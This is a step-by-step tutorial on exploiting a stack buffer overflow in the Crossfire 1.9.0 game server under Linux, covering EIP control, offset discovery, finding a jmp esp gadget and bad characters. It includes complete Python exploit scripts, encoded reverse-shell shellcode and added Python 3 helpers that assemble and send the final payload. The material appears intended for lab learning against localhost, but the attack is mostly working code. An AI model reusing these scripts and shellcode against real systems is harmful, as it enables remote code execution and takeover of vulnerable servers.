Simple buffer overflow under Linux

Source: Internet
Author: User
Tags python script

What is a buffer overflow?

Anyone who has studied assembly knows that when the bounds of a buffer are not strictly checked, malformed data passed into a variable, or an error while the program runs, can make the buffer "burst" and overwrite data in the adjacent memory region.

Successfully modifying that memory can lead to hijacking the process, executing malicious code, taking control of the server, and so on.

Crossfire

    • Multiplayer online RPG game
    • Version 1.9.0 has a buffer overflow in the server-side code that handles data arriving on inbound socket connections

Debugging Tools

    • EDB (Evan's Debugger)

Operating Platform

    • Kali 2.0 x64 virtual machine

Memory protection mechanisms in Linux

    • DEP (non-executable memory)
    • ASLR (address space layout randomization)
    • Stack cookies
    • Stack smashing protection

The exploit below relies on two of these being absent for the old crossfire binary: the binary is mapped at a fixed address, so a jmp esp inside it can be hard-coded, and the stack it jumps to is executable, so shellcode placed there runs.

Because this vulnerability is old, and to avoid our VM being hijacked while we test, restrict the destination port with iptables so that only local access is allowed. If the network is host-only, this can be omitted.

    iptables -A INPUT -p tcp --dport 13327 ! -s 127.0.0.1 -j DROP

Create the /usr/games/ directory and extract the crossfire 1.9.0 server into it:

    mkdir -p /usr/games/
    cd /usr/games/
    tar zxpf crossfire.tar.gz    # extract

Run crossfire to check that it starts:

    /usr/games/crossfire/bin/crossfire

If "Waiting for connections" appears, it works; otherwise look at the error that is printed.

Then load it in EDB:

    edb --run /usr/games/crossfire/bin/crossfire

The lower right corner shows the program in the Paused state. In the menu bar choose Debug > Run (F9); click it twice and the server is running.

You can check the port the program is listening on with:

    netstat -pantu | grep 13327

EIP holds the address of the next instruction to be executed, so whoever controls EIP controls what the program runs next.

This program differs from the usual overflow: the overflow only happens when a fixed amount of data is sent, not simply when "enough" data is sent. We construct the following Python program to test it:

    #!/usr/bin/python
    import socket

    host = "127.0.0.1"
    crash = "\x41" * 4379                      # \x41 is hex for an uppercase A
    # \x90 is a NOP; \x00 is the null character that terminates the string
    buffer = "\x11(setup sound " + crash + "\x90\x00#"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[*] Sending evil buffer..."
    s.connect((host, 13327))
    data = s.recv(1024)
    print data
    s.send(buffer)
    s.close()
    print "[*] Payload sent!"

After running it, EDB stops with an error: EIP has been overwritten with 0x41414141, a value made of the A bytes we sent that points to memory the CPU cannot execute from. Since this value came from our input, EIP is controllable and there is an overflow.

You can also try sending one byte more or one byte less: the value that lands in EIP is then no longer made of A's and is not under our control. EIP is fully controllable only when exactly 4379 bytes are sent.

To find exactly which of the A's end up in EIP after the overflow, use the Metasploit tool that generates a pattern in which every 4-byte sequence is unique:

    cd /usr/share/metasploit-framework/tools/exploit/
    ./pattern_create.rb 4379

Copy the output and put it into the following Python script:

    #!/usr/bin/python
    import socket

    host = "127.0.0.1"
    crash = "<unique string>"                  # paste the 4379-byte output of pattern_create.rb here
    buffer = "\x11(setup sound " + crash + "\x90\x00#"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[*] Sending evil buffer..."
    s.connect((host, 13327))
    data = s.recv(1024)
    print data
    s.send(buffer)
    s.close()
    print "[*] Payload sent!"

Start crossfire in EDB again and run the Python script. EDB now shows EIP = 0x46367046. Feed that value to the companion tool to find where those bytes sit in the pattern:

    ./pattern_offset.rb 46367046

It reports 4368: there are 4368 characters in front of the EIP value, so characters 4369, 4370, 4371 and 4372 are the ones that land in EIP after the overflow.
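The pattern_create / pattern_offset step above, reimplemented in Python 3 as an added example (this is not code from the original page or from Metasploit). It builds the same cyclic pattern Metasploit uses (triples of uppercase letter, lowercase letter, digit) and looks up the EIP value 0x46367046 that EDB showed, taking x86 little-endian byte order into account; the result is the offset 4368 used in the rest of the walkthrough.

```python
import string
import struct

# Metasploit's cyclic pattern "Aa0Aa1Aa2...Zz9": 26*26*10 triples = 20280 bytes,
# within which every 4-byte window is unique.
MAX_PATTERN_LEN = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern."""
    if not 0 < length <= MAX_PATTERN_LEN:
        raise ValueError("length must be between 1 and %d" % MAX_PATTERN_LEN)
    full = "".join(u + l + d
                   for u in string.ascii_uppercase
                   for l in string.ascii_lowercase
                   for d in string.digits)
    return full[:length]


def pattern_offset(eip_value, length=MAX_PATTERN_LEN):
    """Offset of the 4 bytes that were loaded into EIP, or -1 if not found.

    `eip_value` is the register value as the debugger prints it (e.g. 0x46367046).
    x86 is little-endian, so the bytes that sat in memory are the value packed
    with '<I': 0x46367046 -> b"Fp6F".
    """
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)


def eip_positions(offset):
    """1-based positions of the four bytes that land in EIP (the page counts from 1)."""
    return list(range(offset + 1, offset + 5))


if __name__ == "__main__":
    pattern = pattern_create(4379)            # what was sent in place of the A's
    off = pattern_offset(0x46367046)          # value EDB showed in EIP
    print("offset:", off)                     # 4368
    print("bytes at offset:", pattern[off:off + 4])    # Fp6F
    print("EIP positions:", eip_positions(off))        # [4369, 4370, 4371, 4372]
```

Searching the full 20280-byte pattern rather than only the 4379 bytes sent is deliberate: it also catches the case where the debugger shows a value from a longer pattern, and any hit beyond the sent length tells you the value did not come from your buffer.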

We construct the following Python script to verify this:

    #!/usr/bin/python
    import socket

    host = "127.0.0.1"
    crash = "A" * 4368 + "B" * 4 + "C" * 7      # 4379 characters in total
    buffer = "\x11(setup sound " + crash + "\x90\x00#"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[*] Sending evil buffer..."
    s.connect((host, 13327))
    data = s.recv(1024)
    print data
    s.send(buffer)
    s.close()
    print "[*] Payload sent!"

You can see that EIP is filled with exactly the four B characters (0x42424242).

Right-click ESP and choose Follow in Dump to look at the data it points to.

Because the overflow needs exactly 4379 bytes, only the 7 C bytes are at ESP, which is obviously too little room for shellcode.

After looking through the other registers, EAX is chosen: it points at the thousands of A's we sent, which are controllable and large enough to hold shellcode.

The first idea is to put EAX's value plus 12 directly into EIP, so execution starts at the first A (the 12 bytes skipped are the "setup sound " command that precedes our data). But EAX differs from machine to machine, so this hard-coded jump is not portable and is abandoned.

Since ESP has room for 7 bytes, we instead place "add eax, 12 ; jmp eax" there (\x83\xc0\x0c\xff\xe0, 5 bytes, padded with two NOPs).

Construct the following Python code and run it:

    #!/usr/bin/python
    import socket

    host = "127.0.0.1"
    # 4368 bytes of padding, four B's for EIP, then add eax,12 ; jmp eax ; nop ; nop at ESP
    crash = "A" * 4368 + "B" * 4 + "\x83\xc0\x0c\xff\xe0\x90\x90"
    buffer = "\x11(setup sound " + crash + "\x90\x00#"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[*] Sending evil buffer..."
    s.connect((host, 13327))
    data = s.recv(1024)
    print data
    s.send(buffer)
    s.close()
    print "[*] Payload sent!"

First, EIP is still exactly the four B's.

ESP > Follow in Dump shows:

    83 C0 0C FF E0 90 90

so the stub has also been written there intact.

The chain is therefore EIP -> ESP (add eax,12 ; jmp eax) -> EAX (shellcode). Because the ESP address is not fixed, EIP must be given a fixed address that holds a jmp esp instruction rather than a stack address.

Open EDB and choose Plugins > OpcodeSearcher > Opcode Search from the menu bar.

Select the crossfire program and ESP -> EIP, and pick the address of a jmp esp; because the binary is mapped at a fixed address, this address does not change between runs.

Then choose Plugins > BreakpointManager > Breakpoints, click Add, and set a breakpoint on the address chosen above to test it.
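EDB's OpcodeSearcher does the search above inside the debugger. The following Python 3 script is an added example (not code from the page or from EDB) that does the same offline: it parses a 32-bit ELF, scans only the executable PT_LOAD segments for jmp esp (ff e4) and the equivalent push esp ; ret (54 c3), and converts file offsets to virtual addresses. It also reports e_type, because the address is only fixed across runs for an ET_EXEC (non-PIE) binary. The ELF it runs on is constructed inline for the demo, with the gadget placed at 0x08134597 to match the address the page uses; call find_gadgets_in_file on /usr/games/crossfire/bin/crossfire for the real binary.

```python
import struct

ET_EXEC, ET_DYN = 2, 3          # e_type: fixed-address executable vs PIE/shared object
PT_LOAD, PF_X = 1, 1            # program header type and executable flag
GADGETS = {b"\xff\xe4": "jmp esp", b"\x54\xc3": "push esp; ret"}


def find_gadgets(elf, gadgets=GADGETS):
    """Return (sorted [(vaddr, mnemonic)], e_type) for every gadget byte sequence
    found in an executable PT_LOAD segment of a 32-bit little-endian ELF image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("not a 32-bit little-endian ELF")
    e_type, = struct.unpack_from("<H", elf, 16)
    e_phoff, = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    hits = []
    for i in range(e_phnum):
        (p_type, p_offset, p_vaddr, _paddr, p_filesz,
         _memsz, p_flags, _align) = struct.unpack_from("<8I", elf, e_phoff + i * e_phentsize)
        if p_type != PT_LOAD or not p_flags & PF_X:
            continue                                   # only mapped, executable bytes count
        seg = elf[p_offset:p_offset + p_filesz]
        for seq, name in gadgets.items():
            pos = seg.find(seq)
            while pos != -1:
                hits.append((p_vaddr + pos, name))     # file offset -> virtual address
                pos = seg.find(seq, pos + 1)
    return sorted(hits), e_type


def is_fixed_address(e_type):
    """True only for ET_EXEC; a PIE (ET_DYN) binary is relocated by ASLR."""
    return e_type == ET_EXEC


def build_demo_elf(e_type=ET_EXEC):
    """Constructed minimal ELF (demo input, not the real crossfire binary): one
    R+X segment at 0x08134000 with a jmp esp at offset 0x597 -> 0x08134597."""
    code = b"\x90" * 0x597 + b"\xff\xe4" + b"\xc3" * 4 + b"\x54\xc3"
    seg_off = 52 + 32                                  # code right after ELF + program header
    ehdr = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    ehdr += struct.pack("<HHIIIIIHHHHHH",
                        e_type, 3, 1, 0x08134000,     # type, EM_386, version, entry
                        52, 0, 0,                     # phoff, shoff, flags
                        52, 32, 1, 40, 0, 0)          # ehsize, phentsize, phnum, sh*
    phdr = struct.pack("<8I", PT_LOAD, seg_off, 0x08134000, 0x08134000,
                       len(code), len(code), 5, 0x1000)   # flags 5 = R + X
    return ehdr + phdr + code


def find_gadgets_in_file(path):
    with open(path, "rb") as f:
        return find_gadgets(f.read())


if __name__ == "__main__":
    hits, e_type = find_gadgets(build_demo_elf())
    for vaddr, name in hits:
        print("0x%08x  %s" % (vaddr, name))
    print("address fixed across runs:", is_fixed_address(e_type))
```

Only PT_LOAD segments with PF_X are searched because a jmp esp byte pair in a data section would be found by a plain file search but would fault when jumped to.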

Next we test for bad characters; the ones found are \x00\x0a\x0d\x20.

Generate the shellcode, excluding those bad characters:

    cd /usr/share/framework2/
    ./msfpayload -l                                  # list the kinds of shellcode that can be generated
    ./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 R | ./msfencode -b "\x00\x0a\x0d\x20"

Build the final Python script:

    #!/usr/bin/python
    import socket

    host = "127.0.0.1"
    # linux_ia32_reverse to 127.0.0.1:4444, encoded to avoid \x00\x0a\x0d\x20 (105 bytes)
    shellcode = ("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9" +
                 "\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa" +
                 "\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa" +
                 "\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18" +
                 "\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81" +
                 "\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7" +
                 "\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21" +
                 "\x1a\x99\x43\x71\x97\x54\x03")
    # shellcode, padding up to the EIP offset, the jmp esp address (0x08134597, little-endian),
    # then add eax,12 ; jmp eax ; nop ; nop where ESP points
    crash = shellcode + "A" * (4368 - 105) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
    buffer = "\x11(setup sound " + crash + "\x90\x00#"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[*] Sending evil buffer..."
    s.connect((host, 13327))
    data = s.recv(1024)
    print data
    s.send(buffer)
    s.close()
    print "[*] Payload sent!"

Listen on local port 4444 first (for example with nc -lvp 4444), then run the script to get a shell.
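To make the final layout concrete, here is an added Python 3 example (not code from the original page) that assembles the same crash buffer from the page's own 105-byte shellcode, its jmp esp address 0x08134597 and its add eax,12 ; jmp eax stub, and then checks what the walkthrough verified by hand in EDB: the buffer is exactly 4379 bytes, the shellcode contains none of the bad characters \x00\x0a\x0d\x20, bytes 4369-4372 hold the little-endian jmp esp address, the stub sits where ESP will point, and add eax,12 lands on the shellcode. That last check assumes EAX points at the 12-byte "setup sound " command when the stub runs, which is inferred from the page's use of add eax,12 rather than stated by it. The network send is kept in a separate function so the checks run without a server.

```python
import socket
import struct

HOST, PORT = "127.0.0.1", 13327
BADCHARS = b"\x00\x0a\x0d\x20"          # found by the page's bad-character test
JMP_ESP = 0x08134597                     # jmp esp inside crossfire; the page writes it as "\x97\x45\x13\x08"
CRASH_LEN = 4379                         # the only length at which EIP gets overwritten
EIP_OFFSET = 4368                        # from pattern_offset
STUB = b"\x83\xc0\x0c\xff\xe0\x90\x90"   # add eax,12 ; jmp eax ; nop ; nop
COMMAND = b"setup sound "                # 12 bytes; assumption: EAX points here when the stub runs

# The page's msfpayload/msfencode linux_ia32_reverse shellcode (127.0.0.1:4444)
SHELLCODE = (
    b"\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"
    b"\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"
    b"\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa"
    b"\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"
    b"\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"
    b"\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"
    b"\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"
    b"\x1a\x99\x43\x71\x97\x54\x03"
)


def find_bad_chars(data, badchars=BADCHARS):
    """Return (offset, byte) for every bad byte in data; an empty list means clean."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def build_crash(shellcode=SHELLCODE, jmp_esp=JMP_ESP):
    """shellcode | 'A' padding | jmp esp address | add eax,12 ; jmp eax  (4379 bytes)."""
    bad = find_bad_chars(shellcode)
    if bad:
        raise ValueError("shellcode contains bad chars at %r" % bad)
    pad = EIP_OFFSET - len(shellcode)
    if pad < 0:
        raise ValueError("shellcode longer than %d bytes" % EIP_OFFSET)
    crash = shellcode + b"A" * pad + struct.pack("<I", jmp_esp) + STUB
    if len(crash) != CRASH_LEN:
        raise AssertionError("crash buffer is %d bytes, not %d" % (len(crash), CRASH_LEN))
    return crash


def build_request(crash):
    """The full message as the page sends it: command prefix, crash buffer, terminator."""
    return b"\x11(" + COMMAND + crash + b"\x90\x00#"


def check_layout(crash, shellcode=SHELLCODE):
    """The checks the page did by hand in EDB, as a dict of booleans."""
    eax_view = COMMAND + crash               # what EAX points at (assumption above)
    return {
        "length": len(crash) == CRASH_LEN,
        "eip_is_jmp_esp": crash[EIP_OFFSET:EIP_OFFSET + 4] == struct.pack("<I", JMP_ESP),
        "esp_holds_stub": crash[EIP_OFFSET + 4:] == STUB,
        "eax_plus_12_is_shellcode": eax_view[12:12 + len(shellcode)] == shellcode,
    }


def send_request(request, host=HOST, port=PORT):
    """Start the listener first (e.g. nc -lvp 4444), then call this."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    banner = s.recv(1024)
    s.send(request)
    s.close()
    return banner


if __name__ == "__main__":
    crash = build_crash()
    print(check_layout(crash))
    print("[*] Sending evil buffer...")
    print(send_request(build_request(crash)))
    print("[*] Payload sent!")
```

The padding is computed from the shellcode length instead of being hard-coded as 4368 - 105, so swapping in a different encoded payload keeps the EIP slot at offset 4368 automatically, and a payload containing a bad character is rejected before anything is sent.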

